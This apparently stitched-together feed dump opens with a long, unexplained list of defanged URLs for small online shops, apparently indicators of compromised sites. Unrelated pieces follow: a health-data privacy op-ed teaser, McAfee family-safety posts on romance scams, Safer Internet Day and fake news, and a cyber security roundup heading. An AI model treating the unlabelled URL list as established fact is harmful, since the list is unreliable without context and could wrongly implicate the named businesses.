URL: http://www.]kupu.]es/
URL: http://hotelcathedrale.]be/
URL: https://magesource.]su/
URL: http://www.]nurserydecalsandmore.]com/
URL: http://hotelcathedrale.]be/
URL: http://only16.]net/
URL: http://www.]myvanaccessories.]co.]uk/
URL: http://www.]mynumberplates.]com/
URL: https://myphonetics.]com/
URL: http://www.]myengineoil.]co.]uk/
URL: http://www.]mywiperblades.]co.]uk/
URL: http://www.]opticalsupplies.]com/
URL: https://www.]ezy-care.]co.]uk/
URL: http://www.]britoil.]co.]uk/
URL: http://hotelcathedrale.]be/
URL: http://www.]doftec.]com/
URL: http://garudakart.]com/
URL: http://legalprintllc.]com/
URL: http://lukasandlara.]com/
URL: http://hotelcathedrale.]be/
URL: http://stonemanasia.]com/
URL: http://stonemanasia.]com/
URL: http://hotelcathedrale.]be/
URL: https://myphonetics.]com/
URL: http://alltradeshowdisplay.]com/
URL: http://www.]virmans.]com/
URL: http://www.]gramton.]com/
URL: http://hotelcathedrale.]be/
URL: http://magescore.]com/
URL: http://www.]thevintagegrapes.]com/
URL: http://english-furniture.]co.]uk/
URL: http://stonemanasia.]com/
URL: http://jacksvapes.]com/
URL: http://unsquashaball.]com/
URL: https://www.]eyewear69.]my/
URL: http://www.]vandrugboards.]com/
URL: http://qandmantiqueluxury.]com/
URL: http://hivepackaging.]com/
URL: http://www.]4d-printology.]com/
URL: http://hotelcathedrale.]be/
URL: http://diamondwrapfactory.]com/
URL: http://petanyway.]net/index.%5Dphp/why-not-available/
URL: http://hotelcathedrale.]be/
URL: http://www.]lobsters.]com.]sg/
URL: https://www.]arenaflorist.]com/
URL: http://www.]mrsflorist.]co.]in/
URL: http://www.]loosen-up.]com/
URL: http://labdooshoes.]com/
URL: http://www.]pibeauty.]com/~pibeauty/
URL: http://hotelcathedrale.]be/
URL: https://www.]paudicesrl.]it/
URL: http://hotelcathedrale.]be/
URL: http://eshop.]wengthyelot54.]com/
URL: https://mustardoc.]com/
URL: http://hotelcathedrale.]be/
URL: https://electroshopnow.]com/
URL: http://kmmachinery.]com/
URL: http://kmglasstools.]com/
URL: http://hotelcathedrale.]be/
URL: http://dealelement.]com/
URL: http://www.]matexbuyer.]com/
URL: http://hotelcathedrale.]be/
URL: http://www.]xentogo.]com/
URL: http://hotelcathedrale.]be/
URL: http://shoefactoryindia.]com/
URL: http://hotelcathedrale.]be/
URL: http://solarinfrasystems.]com/
URL: https://electroshopnow.]com/
URL: https://www.]macroman.]in/
URL: http://juwelier-tarasek.]de/
URL: https://dourosoptika.]gr/
URL: https://www.]straightfromfarmers.]com.]au/
URL: http://hotelcathedrale.]be/
URL: http://www.]uiterkits.]com/
URL: http://de-lices.]ru/
URL: http://hotelcathedrale.]be/
URL: http://store.]uggtasman.]com.]au/
URL: http://hotelcathedrale.]be/
URL: http://rpkorea.]com/
URL: https://www.]sellsspares.]com/
URL: http://www.]fashionaxe.]com/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://fenxiangheaven.]com/
URL: http://www.]i91cloud.]com/
URL: https://www.]ikonmotorsports.]com/
URL: https://gorusticx.]com/
URL: http://www.]lobsters.]com.]sg/
URL: http://www.]ororganicliving.]com/
URL: http://www.]lifestylea-list.]com/
URL: http://www.]grovz.]com/
URL: http://diamondwrapfactory.]com/
URL: http://omniscrubs.]com/
URL: http://www.]4d-printology.]com/
URL: http://www.]northhillco.]com/
URL: http://devdantona.]com/
URL: http://deeprosso.]com/
URL: http://www.]fashionaxe.]com/
URL: http://www.]iousi.]com.]cn/
URL: http://hotelcathedrale.]be/
URL: https://kolcraft-staging.]gianthatworks.]com/
URL: http://hotelcathedrale.]be/
URL: http://only16.]net/
URL: http://www.]eurekacosmetics.]com/
URL: http://momega.]vn/
URL: http://hotelcathedrale.]be/
URL: http://www.]virmanishop.]com/
URL: http://goofballstuff.]com/
URL: http://hotelcathedrale.]be/
URL: http://om10.]ru/
URL: http://www.]nurserydecalsandmore.]com/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://www.]baudacarlota.]com.]br/index.%5Dphp
URL: http://www.]baudacarlota.]com.]br/index.%5Dphp%7C
URL: http://www.]baudacarlota.]com.]br/index.%5Dphp
URL: http://www.]baudacarlota.]com.]br/index.%5Dphp%7C
URL: http://hotelcathedrale.]be/
URL: https://www.]ikonmotorsports.]com/
URL: http://hotelcathedrale.]be/
URL: http://www.]cityflorist.]co.]in/
URL: http://www.]webshopsmagento.]nl/
URL: http://hotelcathedrale.]be/
URL: http://goldwithyou.]com/
URL: http://hotelcathedrale.]be/
URL: https://herbaloja.]online/
URL: http://www.]surprise.]ps/
URL: http://hotelcathedrale.]be/
URL: http://store.]curiousinventor.]com/
URL: http://www.]magento.]flyermonster.]de/
URL: http://hotelcathedrale.]be/
URL: https://deals4kart.]com/
URL: http://academycreative.]cz/
URL: http://www.]webshopsmagento.]nl/
URL: http://hotelcathedrale.]be/
URL: http://cuberra.]eu/
URL: http://hotelcathedrale.]be/
URL: https://www.]smclinic.]bg/
URL: http://shoefactoryindia.]com/
URL: http://www.]fiskrose.]com/
URL: https://myworldphone.]com/
URL: https://www.]khadiindia.]in/
URL: http://www.]kevinbuou.]com/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://www.]ajshoes.]top/index.%5Dphp?route=checkout/checkout
URL: https://deals4kart.]com/
URL: http://www.]fangshicube.]com/
URL: http://www.]gpmbv.]com/
URL: http://va-store.]de/
URL: http://www.]webshopsmagento.]nl/
URL: http://jewelsofdesert.]com/
URL: http://www.]khadioutlet.]com/
URL: http://lequeens.]com/
URL: http://stilprinzessin.]com/
URL: http://www.]doreall.]com/
URL: http://hotelcathedrale.]be/
URL: http://www.]webshopsmagento.]nl/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://www.]fangshicube.]com/
URL: http://luggagemama.]com/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://cyprusitstore.]com/
URL: https://deals4kart.]com/
URL: http://www.]webshopsmagento.]nl/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://www.]ajshoes.]top/index.%5Dphp?route=checkout/checkout
URL: http://hotelcathedrale.]be/
URL: http://www.]myvanaccessories.]co.]uk/
URL: http://www.]arquegym.]com.]br/
URL: http://www.]britoil.]co.]uk/
URL: http://hotelcathedrale.]be/
URL: https://www.]chirobuddy.]net/
URL: http://hotelcathedrale.]be/
URL: http://www.]electricalswholesale.]co.]uk/
URL: http://www.]matexbuyer.]com/
URL: http://www.]webshopsmagento.]nl/
URL: https://www.]straightfromfarmers.]com.]au/
URL: http://hotelcathedrale.]be/
URL: http://www.]doreall.]com/
URL: https://pinkime.]com/
URL: https://www.]websun.]us/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://store.]curiousinventor.]com/guides/Surface_Mount_Soldering/Tools
URL: http://www.]electricalswholesale.]co.]uk/
URL: http://momega.]vn/
URL: http://hotelcathedrale.]be/
URL: http://magesource.]su/
URL: http://magesource.]su/
URL: http://magesource.]su/
URL: http://only16.]net/
URL: http://labdooshoes.]com/
URL: http://www.]webshopsmagento.]nl/
URL: http://hotelcathedrale.]be/
URL: http://om10.]ru/
URL: http://lequeens.]com/
URL: http://www.]athleticmmagear.]com/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://hotelcathedrale.]be/
URL: http://www.]almosauto.]in/
URL: http://douspeakgreen.]in/
URL: http://www.]eurekacosmetics.]com/
URL: http://hotelcathedrale.]be/
URL: http://coripa.]net/
URL: http://hotelcathedrale.]be/
URL: http://www.]tribalasia.]com.]my/
URL: http://hotelcathedrale.]be/
URL: https://www.]xinginroo.]com/
URL: http://magesource.]su/
URL: https://www.]khadiindia.]in/
URL: http://www.]supritam.]com/
URL: http://magesource.]su/
URL: http://store.]curiousinventor.]com/
URL: http://www.]blendystraw.]com/
URL: http://www.]barcoderfidstore.]com/
URL: http://douspeakgreen.]in/
URL: http://fashionfromla.]com/
URL: http://seasonallivingokc.]com/
URL: http://floorzndoorz.]com/
URL: http://formula-depot.]com/
URL: http://zigoh.]com/
URL: https://www.]baleyo.]com/
URL: http://luggagemama.]com/
URL: http://magesource.]su/
URL: http://hotelcathedrale.]be/
URL: http://emediks.]com/store/
URL: http://www.]fashionaxe.]com/
URL: http://schrikdraad.]nu/
URL: http://www.]liquidfillingpastefilling.]com/
URL: http://hotelcathedrale.]be/
URL: http://bymatty.]com/
URL: http://www.]sclabrine.]com/
URL: https://www.]bluecactus.]co/
URL: http://fashionavenue.]ma/
URL: http://yesforlov.]sk/
URL: https://vytunuj.]sk/
URL: http://www.]nflskjor.]com/
URL: http://www.]acolortree.]com/
URL: https://cobrafashions.]com/
URL: http://www.]wondershop.]in/
URL: http://sockitupsocks.]com/
URL: http://richbumlife.]com/
URL: http://gypsygfashionaccessories.]com/
URL: https://www.]bvsecurity.]com/
URL: http://www.]fiskrose.]com/
URL: https://espacomanix.]com.]br/
URL: http://www.]nixim3dpuzzle.]com/
URL: http://www.]almosauto.]in/
URL: http://www.]mage-apps.]de/
URL: http://budstok.]com.]ua/
URL: http://stage.]citizencashmere.]com/
URL: http://www.]nitazdesign.]com/
URL: http://goldwithyou.]com/
URL: http://chkmaid.]com/
URL: http://www.]mattiaus.]com/
URL: http://www.]hcgsci.]com/
URL: http://eshop.]wengthyelot54.]com/
URL: http://bartonwest.]com/
URL: http://gravurator.]de/
URL: http://platz.]com.]ua/
URL: https://5eboard.]com/
URL: http://khadder.]in/
URL: https://novnation.]com/
URL: https://www.]taptye.]com/
URL: https://seelar.]com/
URL: http://www.]1quickcomp.]com/
URL: http://pinul.]com/
URL: http://www.]99materials.]com/
URL: http://southernvapor.]com/
URL: http://www.]pejenterprisesinc.]com/
URL: http://www.]ejoyeeta.]com/
URL: http://www.]retailsigningsolutions.]com/
URL: http://www.]fyringe.]com/
URL: http://www.]suninbox.]co.]uk/
URL: http://www.]gohoyo.]com/
URL: http://eveday.]com/
URL: https://www.]el-taller.]pe/
URL: https://www.]dazzstyle.]com/
URL: http://montecitocaviar.]com/
URL: http://www.]togotelecom.]ca/
URL: http://swimresearch.]com/
URL: https://eighteditions.]com/
URL: https://srmall.]net/
URL: https://hyperstrength.]com/
URL: https://www.]gardenarteu.]com/
URL: http://deltanineclothing.]com/
URL: http://www.]storerab.]com/
URL: http://floorzndoorz.]com/
URL: http://4girlsaccessories.]com/
URL: http://www.]cityflorist.]co.]in/
URL: http://faithandflags.]com/
URL: https://www.]theaugustco.]com/
URL: http://francomotorsports.]com/
URL: http://www.]reviewlista.]com/
URL: http://www.]luckystarparty.]com/
URL: http://www.]interprice.]mx/
URL: http://www.]xxlgrip.]com/
URL: http://avstamps.]com/
URL: https://www.]baleyo.]com/
URL: http://www.]905wood.]com/
URL: https://www.]macroman.]in/
URL: http://cuberra.]eu/
URL: https://www.]velmo.]com/
URL: https://wonderna.]com/
URL: http://www.]spectrumlites.]co.]in/
URL: http://kupi-present.]ru/
URL: http://plumbedright.]com/
URL: http://equibuy.]es/
URL: https://www.]tec-heads.]com/
URL: http://advancehealthproducts.]com.]au/
URL: http://www.]inflatable-zone.]org/
URL: https://dermagold.]sg/
URL: http://www.]ibericos.]es/
URL: http://worldstogether.]com/
URL: http://www.]reflect-store.]com/
URL: http://www.]kaajalsarees.]com/
URL: http://www.]arquegym.]com.]br/
URL: http://www.]benzin-im-blut.]com/
URL: http://www.]ladago.]co.]uk/
URL: http://clonadipet.]com.]br/
URL: http://www.]louboutinuk.]co.]uk/
URL: https://onestophairandbeauty.]ie/
URL: http://www.]jensalwholesale.]com/
URL: https://www.]chirobuddy.]net/
URL: http://tile.]tilesandiego.]com/
URL: https://morrio.]com/
URL: http://cadresrobain.]fr/
URL: http://www.]petzy.]com.]au/
URL: http://www.]dysin.]com/
URL: http://buyvipbaby.]com/login/
URL: http://www.]olisano.]com/
URL: http://www.]thevintagegrapes.]com/
URL: http://www.]ludoville.]it/
URL: http://zigoh.]com/
URL: http://usacontainergroup.]com/
URL: https://www.]clinicallearning.]com/index.%5Dphp/
URL: http://www.]farmcraft.]at/
URL: http://www.]poyood.]com/
URL: http://euromigracija.]lt/
URL: http://goofballstuff.]com/
URL: https://www.]enlivenglobal.]com/
URL: http://www.]turyagatea.]com/
URL: http://creekfire.]com/
URL: http://nowknow.]ch/
URL: http://vkconline.]com/
URL: https://trinitysurvival.]com/
URL: http://www.]eboxim.]com/
URL: http://www.]ilovedelfruito.]com/
URL: http://www.]danatsouq.]com/
URL: https://www.]callidae.]com/
URL: https://www.]tramit.]it/
URL: http://jjnc.]com.]hk/
URL: http://shop.]taketime.]ch/
URL: https://lacnehry.]sk/
URL: https://ibercorte.]com/
URL: http://www.]macmax.]com/uk/
URL: http://www.]raquelrecargas.]com.]br/
URL: http://www.]hotsca.]com/
URL: http://www.]jarab.]london/
URL: http://www.]webshopsmagento.]nl/
URL: http://start-finish.]ru/
URL: http://www.]officiel.]it/
URL: http://www.]isbbookstore.]com/
URL: http://www.]krirob.]nu/
URL: http://www.]eurekacosmetics.]com/
URL: http://kupu.]es/
URL: http://en.]lileauxbrocantes.]com/nouveautes.%5Dhtml
URL: http://girlsandpearls.]com/
URL: https://www.]websun.]us/
URL: http://www.]vintageindiarishikesh.]com/
URL: http://piese-gm.]ro/
URL: http://www.]diamondsnyou.]com/
URL: http://ccgobuy.]com/
URL: http://olenobra.]com/
URL: https://www.]eternis.]pt/
URL: http://infcollection.]com/
URL: http://lojamundodosgames.]com/
URL: http://purplebluepublishing.]com/
URL: https://www.]autowheelexperts.]com/
URL: https://www.]gizell.]ro/
URL: http://smalldogsdepot.]com/
URL: http://www.]hessiansantasacks.]co.]uk/
URL: http://laborisfarma.]pl/
URL: http://fashionfromla.]com/
URL: https://www.]sellsspares.]com/
URL: http://www.]soothnshine.]com/
URL: http://jacksvapes.]com/
URL: https://www.]richgromart.]com/
URL: http://www.]safetreksales.]com/
URL: http://ibundo.]de/
URL: http://www.]megamojster.]si/
URL: http://rpkorea.]com/
URL: http://discountadda.]com/
URL: http://www.]enotecaosteriaroma.]it/
URL: http://nopainnomusa.]com/
URL: https://www.]shopforsaundarya.]com/
URL: http://accessoriesdeluxe.]com/
URL: https://www.]krausjeans.]com/
URL: http://www.]ghulamali.]com.]pk/
URL: http://www.]hardshot.]fr/
URL: http://countrystorecampinas.]com.]br/
URL: http://p-d-r.]ru/
URL: http://demo.]freelunchlabs.]com/
URL: http://atopmall.]kr/
URL: http://hurtsilvermagic.]pl/customer/account/login/
URL: https://www.]afsr-simivalley-shop.]com/
URL: http://www.]dutwsnmare.]com/
URL: http://produtosprofissionais.]com.]br/
URL: https://my.]nutis.]com/
URL: https://www.]smclinic.]bg/
URL: https://www.]wisesolutions.]net/
URL: https://davillblinds.]com/
URL: https://minervamedical.]ca/
URL: http://gamsjaga.]com/
URL: https://jceracing.]com/
URL: http://dhyanaa.]com/
URL: https://weloveheipoa.]com/
URL: http://www.]advanced-pixel-shuttle.]com/
URL: http://allright.]dp.]ua/
URL: http://trueitglobal.]com/
URL: http://www.]nandndesign.]com/
URL: http://antaraxnm.]com/
URL: http://www.]petitkreativ.]at/
URL: https://www.]crowngroup.]net.]au/shop/
URL: http://vanquish.]co.]in/
URL: http://www.]esde.]ro/
URL: https://liquidlightglows.]com/
URL: http://shop.]littleashford.]co.]za/
URL: https://lens4us.]com/
URL: https://www.]westernelitejewelry.]com/
URL: http://www.]mobilprices.]com/
URL: http://blitarzoneid.]blogspot.]com/
URL: http://kraftitude.]com/
URL: http://grupocyber.]net/
URL: http://elektro-wols.]kompass-media.]eu/
URL: http://classico.]nextmp.]net/
URL: http://www.]nationaltiledistribution.]com/
URL: http://bloomingtrails.]com/
URL: http://redcellmedical.]com/
URL: http://patesting.]ie/
URL: http://www.]bysicilia.]it/
URL: http://kibellariding.]com/
URL: https://www.]ladoudounesolde.]com/
URL: http://www.]anjelskedarceky.]sk/
URL: https://poolstore.]com.]au/
URL: http://sklepsilvermagic.]pl/
URL: http://www.]uebuys.]com/
URL: http://www.]reynsaon.]com/
URL: http://eshop.]javwireless.]com/
URL: http://alphafxtestbooster.]com/
URL: https://decor-boutique.]com/
URL: http://www.]kevinbuou.]com/
URL: https://www.]aioma.]it/
URL: http://luxuryjewelleryto.]com/
URL: http://www.]angcoshop.]com/
URL: https://www.]vayobv.]com/
URL: http://de-lices.]ru/
URL: https://democanopy.]com/
URL: https://mustardoc.]com/
URL: http://www.]gourmetgallery.]sk/
URL: http://fetchscripts.]com/
URL: http://ballcancersucks.]com/
URL: https://xtremevisionhid.]com/
URL: http://www.]brushncanvas.]com/
URL: https://kolcraft-staging.]gianthatworks.]com/
URL: http://www.]haitralled.]com/
URL: https://hanarovendas.]com.]br/
URL: http://www.]plasticrewards.]com/
URL: http://www.]universalbumpkeys.]com/
URL: http://zuzugadgets.]com/
URL: https://freshyeat.]com/
URL: http://alch.]it/
URL: http://asap.]co.]in/
URL: https://www.]majesticlightinginc.]com/
URL: https://www.]1by1shop.]com/
URL: https://www.]kitauto.]pt/
URL: http://sandoggrus.]dk/
URL: http://www.]shieldmans.]com/
URL: http://zapal.]com.]ua/
URL: https://www.]farmaciabovisa.]it/
URL: http://gurmanebi.]com/
URL: http://www.]sportlowcost.]it/
URL: http://www.]minopuntomoda.]com/
URL: http://mstech.]com.]au/
URL: http://magegaga.]com/
URL: http://www.]matexbuyer.]com/
URL: http://hotelcathedrale.]be/
URL: http://www.]pibeauty.]com/~pibeauty/
URL: http://shop-camera.]com/
URL: http://hotelcathedrale.]be/
URL: http://alltradeshowdisplay.]com/
URL: http://hikvision-ir.]com/
URL: http://shop-camera.]com/
URL: http://homelykart.]com/
URL: https://www.]bvsecurity.]com/
URL: http://mebli-z.]com/
URL: https://mustardoc.]com/
URL: https://www.]krausjeans.]com/
URL: http://www.]dutwsnmare.]com/
URL: http://www.]gramton.]com/
URL: http://usacontainergroup.]com/
URL: http://tile.]tilesandiego.]com/
URL: http://bartonwest.]com/
URL: https://www.]dazzstyle.]com/
URL: https://minervamedical.]ca/
URL: http://www.]inflatable-zone.]org/
URL: http://www.]ilovedelfruito.]com/
URL: http://www.]hotsca.]com/
URL: http://www.]uebuys.]com/
URL: http://girlsandpearls.]com/
URL: http://obeikandl.]com/
URL: http://thanhloc1.]com/
URL: http://seasonallivingokc.]com/
URL: https://www.]macroman.]in/
URL: https://www.]petremedies.]co.]uk/
URL: http://www.]hessiansantasacks.]co.]uk/
URL: http://naturagladlife.]com/
URL: http://www.]protezzla-direct.]com/nkc-ledenvoordeel/
URL: https://commercialpoolandspasupplies.]com/
URL: http://www.]sclabrine.]com/
URL: http://www.]quimex.]com.]ar/
URL: http://lojamundodosgames.]com/
URL: http://om10.]ru/
URL: http://www.]webshopsmagento.]nl/
URL: http://www.]suninbox.]co.]uk/
URL: https://www.]vayobv.]com/
URL: http://www.]louboutinuk.]co.]uk/
URL: https://www.]ikonmotorsports.]com/
URL: http://hotelcathedrale.]be/
URL: https://www.]eternis.]pt/
URL: http://www.]arquegym.]com.]br/
URL: http://fetchscripts.]com/
URL: http://petit-univers.]com/
URL: https://www.]krausjeans.]com/
URL: http://store.]uggtasman.]com.]au/
URL: http://ledrus.]co.]nz/
URL: http://obeikandl.]com/
URL: http://hotelcathedrale.]be/
URL: http://net-istore.]ro/
URL: http://www.]mrsflorist.]co.]in/
URL: http://shop-camera.]com/

Our personal health history is too valuable to be harvested by the tech giants | Eerke Boiten

Action to prevent deeper access to our private lives and data is more essential than ever

Health data paints a rich picture of our lives. Even if you remove your name, date of birth and NHS number to “anonymise” yourself, a full health history will reveal your age, gender, the places where you have lived, your family relationships and aspects of your lifestyle.

Used in combination with other available information, this may be enough to verify that this medical history relates to you personally and to target you online. Consequently, whenever the NHS shares health data, even if it is anonymised, we need to have confidence in who it goes to and what they can do with it.

When data about us influences a credit rating or a hiring decision, we are unlikely ever to find out

Continue reading...

How You (and Your Teen) Can Stay Safe While Looking for Love Online

Valentine’s Day is such a double-edged sword. If you’re feeling the love and just can’t get enough of your sweetheart – then I wish you a wonderful day. If, on the other hand, you are unattached and feeling a little lonely then chances are you’re thinking about trying your luck on an online dating app.

Every year, traffic to dating apps surges around Valentine’s Day because let’s be honest – who wants to be lonely? But it’s not just adults who frequent dating sites to find their perfect match – teens do too!

Dating Apps – Proceed with Caution!!!

The increasing popularity of these sites means that scammers are spending considerable time and energy targeting people to con. And don’t forget that many teens are on these sites too – even as young as 16! You don’t have to look far to find stories of people who have been tricked into transferring large sums of money to their ‘online lovers’. And in more recent years, romance scammers are now tricking new partners into illegally relaying stolen funds!

Romance Scammers Now Searching for New ‘Online Love’ in Games

According to the Australian Competition and Consumer Commission (ACCC), romance scammers are now also targeting non-dating apps to look for new vulnerable ‘online lovers’. In fact, 38 Aussies lost almost $600,000 through gaming app Words with Friends, an online version of Scrabble. Most of the losses were through direct bank transfers however iTunes, Steam and Google Play gift cards were also commonly used. Games such as Words with Friends are very popular with both tweens and teens, so please share these stores with them.

How to Stay Safe While Searching for Love Online

I have several friends who have found the ‘love of their lives’ online so please remember that not everyone you meet online is a scammer. However, it is essential that you are ALWAYS on guard and cautiously suspicious until such time as your new online love has proven themselves. Here are my top tips for staying safe:

  1. Limit how personal you get 

    Scammers today prey on the human need to feel connected to one and other. The key is to be always careful with the information that you share online. Whether it’s Tinder, OkCupid, Bumble, or even Facebook or Instagram, only share what is absolutely necessary. Your personal information can easily be pieced together by a scammer to access your personal information, your bank accounts or even steal your identity. Start with being clever with your profile names on dating sites and apps – never give out your full name.

  2. Do your homework

    If you’ve met someone online, always do your homework before meeting them in person. Why not get Google working for you? A Google search is a great place to start and even using Google Images will help you get a better understanding of a person. And don’t forget to check out their LinkedIn account too. Another option would be to track down mutual friends and ask questions about your new online partner.

  3. Think before you send

    Sharing intimate pictures or videos with the person you’re dating online may be a good idea right now but please take a moment before pressing send to think about how this could come back to haunt you in the future. Remember, once those pictures and videos are online, they are online forever. Even social media apps with disappearing images, such as Snapchat, can be easily circumvented with a screenshot.  It’s not just celebrities who have intimate pictures spread around the Internet!

  4. Make passwords a priority

    Ensure all your online dating and social media accounts, and all your devices, have separate and unique passwords. Ideally, each password should have a combination of lower and upper case letters, numbers and special characters. I love using a nonsensical, crazy sentence!

And please remember to share your online romance vigilance with your budding teen Romeos and Juliets. It is incredibly common for teens to use dating sites to find someone special. Even though it may be a tad awkward and uncomfortable, as parents we need to do all we can to keep our offspring safe – particularly when their hormones are raging!!

Till Next Time!!

Happy Valentine’s Day!!

 

 

 

The post How You (and Your Teen) Can Stay Safe While Looking for Love Online appeared first on McAfee Blogs.

Safer Internet Day 2020

What Can You Do To Make The Internet a Better Place

In 2020, you’d be hard-pressed to find an Aussie teen who doesn’t spend a fair whack of their time online. And while many of us parents don’t always love the time our offspring spend glued to screens, most of us have come to accept that the online world is a big part of our kids’ lives.

So, let’s accept that the internet is going to be a feature of our kids’ lives and work out how best we can keep them safe.

Together For A Better Internet

Today is Safer Internet Day  – an international annual event that encourages us all to work together for a better internet. The perfect opportunity to find out what we can do as parents to ensure our kids are as safe as possible online.

Organised by the joint Insafe/INHOPE network, with the support of the European Commission, Safer Internet Day is held each February to promote the safe and positive use of digital technology, especially among children and young people. Safer Internet Day is all about inspiring users to make positive changes online, to raise awareness of online safety issues, and participate in events and activities right across the globe.

What Can We Do As Parents?

As role models and life-educators, parents play an enormous role in shaping our kids’ behaviours and opinions – particularly before they get to the teenage years!! So, why not use Safer Internet Day as a prompt to freshen up your cybersafety chats with your brood.

Not sure where to start? Here are my top messages to weave into your chats with your kids

  1. Be Kind Online

Spread love not hate online. A better internet includes building an online culture where people share positive and encouraging posts and comments. It may be as simple as posting a positive message, liking a post that is encouraging or sharing an inspiring article. Image

It may sound obvious but before you post a comment or a tweet, ask yourself whether the message could offend someone or impact them negatively. And remember to NEVER like, favourite, retweet, post or comment negatively online.

  1. Learn How To Disagree Respectfully Online

No matter how much we try, there will always be some people online who get a kick out of being unkind. If you come across this behaviour, I encourage you to call it out and report it but ALWAYS do so in a respectful fashion. Reciprocating with harsh words or name-calling will only further inflame a toxic situation. A logical, factual response that is respectful will always triumph!

  1. Protecting Your Online Reputation (& Others Too)

If you’re planning on hiring someone or even going on a date with someone, the chances are you’re going to ‘Google’ them first. And what you find online and the opinion you form decides whether the person’s digital reputation is acceptable or not.

So, it’s essential to remember that everything you post online is permanent and public; not to post inappropriate comments or pics of yourself or others; ensure all your online profiles are set to private to avoid strangers ‘screen-grabbing’ your private info and photos; don’t respond to inappropriate requests and most importantly, take a breather when things are getting heated online and you may regret your comments and actions.

  1. Passwords!!!!!

Managing passwords is one of the best ways of taking control of your online life and creating a better internet. Ensuring you have a separate password for every online account means that if you are affected by a data breach, your other online accounts are not at risk. Always choose passwords that have letters, numbers and symbols and ensure they are complex and not obvious. I love using a nonsensical sentence! And if all that’s too hard, why not consider a password manager that not only creates complex passwords for each of your online accounts but remembers them too. All you need to do is remember the master password! Awesome!!

So, why not pledge to change up your cybersafety chats with your kids this Safer Internet Day? And remember – they are watching you too! So, ensure you always model online respect, take your online responsibilities seriously and, also manage your passwords carefully. Because every little step is a step towards a positive change.

 

 

 

 

 

 

The post Safer Internet Day 2020 appeared first on McAfee Blogs.

Spotting Fake News: Teaching Kids to be Responsible Online Publishers

fake news

Editor’s note: This is part II in a series on Fake News. Read part I, here.

Kids today are not equipped to deal with the barrage of digital information coming at them every day. Add to that, the bulk of information that may be fake, misleading, or even malicious. So how do we help kids become more responsible for the content they share online?

We do it one conversation at a time.

When it comes to the mounting influence of fake news, it’s easy to point the finger at the media, special interest groups, politicians, and anyone else with an agenda and internet access. While many of these groups may add to the problem, each one of us plays a role in stopping it.

What’s our role?

We, the connected consumer, now play such a significant role in how content is created and disseminated, that a large part of the solution comes down to individual responsibility — yours and mine.

The shift begins with holding ourselves accountable for every piece of content we read, create, or share online. That shift gains momentum when we equip our kids to do the same.

Teach personal responsibility. Start the conversation around personal responsibility early with your kids and keep it going. Explain that every time we share fake news, a rumor, or poorly sourced material, we become one cog in the wheel of spreading untruths and even malicious fabrications. We become part of the problem. Challenge your child to become a trustworthy, discerning source of information as opposed to being viewed by others as an impulsive, unreliable source.

Discuss the big picture. Fake news or misleading content isn’t just annoying; it’s harmful in a lot of other ways. Misinformation undermines trust, causes division, can spark social unrest, and harm unity. More than that, fake news edges out helpful, factual, content designed to educate and inform.

Be aware of confirmation bias. Confirmation bias is gravitating toward ideas, people, and content that echoes our spiritual, social, political, or moral points of view. Confirmation bias tempts us to disregard information that opposes our ideology. While confirmation bias is part of our human nature, left unchecked, it can be an obstacle to learning factual information.

Chill, don’t spill. Fake news is designed to advance a personal agenda. This is especially true during times of social tension when tempers are running high. Don’t take the emotional bait. Exercise discernment. Before sharing, read legitimate news sources that offer balanced coverage, so the story you share or opinion you express is based on accurate information.

Be a free thinker. Our kids have grown up in a world where ‘like’ and ‘share’ counts somehow equate to credibility. Encourage kids to break away from the crowd and have the courage to be free, independent thinkers.

Challenge content by asking:

  • Do I understand all the points of view of this story?
  • What do I really think about this topic or idea?
  • Am I overly emotional and eager to share this?
  • Am I being manipulated by this content?
  • What if I’m wrong?

Question every source. Studies show that people assume that the higher something ranks in search results, the more factual or trustworthy the information is. Wrong. Algorithms retrieve top content based on keywords, not accuracy. So, dig deeper and verify sources.

5 ways to spot fake news

1. Look closely at the source. Fake news creators are good at what they do. While some content has detectable errors, others are sophisticated and strangely persuasive. So, take a closer look. Test credibility by asking:

  • Where is the information coming from? 
  • Is this piece satire?
  • Is the author of the article, bio, and website legitimate? 
  • Are studies, infographics, and quotes appropriately attributed?
  • Is the URL legitimate (cnn.comvs. cnn.com.co)?
  • Are there red flags such as unknown author, all capital letters, misspellings, or grammar errors?

2. Be discerning with viral content. Often a story will go viral because it’s so unbelievable. So pause before you share. Google the story’s headline to see if the story appears in other reliable publications.

3. Pay attention to publish dates, context. Some viral news items may not be entirely false, just intentionally shared out of context. Fake news creators often pull headlines or stories from the past and present them as current news to fit the desired narrative.

4. Beware of click-bait headlines. A lot of fake news is carefully designed with user behavior in mind. A juicy headline leads to a false news story packed with even more fake links that take you to a product page or, worse, download malware onto your computer, putting your data and privacy at risk. These kinds of fake news scams capitalize on emotional stories such as the recent tragic death of basketball great Kobe Bryant.

5. Verify information. It takes extra effort, but plenty of sites exist that can help you verify a piece of information. Before sharing that a piece of content, check it out on sites like:

  • Snopes.com
  • Factcheck.com
  • Politifact.org
  • Opensecrets.org
  • Truthorfiction.com
  • Hoaxslayer.com

While fake news isn’t a new phenomenon, thanks to technology’s amplification power, it’s reached new levels of influence and deception. This social shift makes it imperative to get in front of this family conversation as soon as possible especially since we’re headed into an election year.

The post Spotting Fake News: Teaching Kids to be Responsible Online Publishers appeared first on McAfee Blogs.

Cyber Security Roundup for February 2020

A roundup of UK focused cyber and information security news stories, blog posts, reports and threat intelligence from the previous calendar month, January 2020.

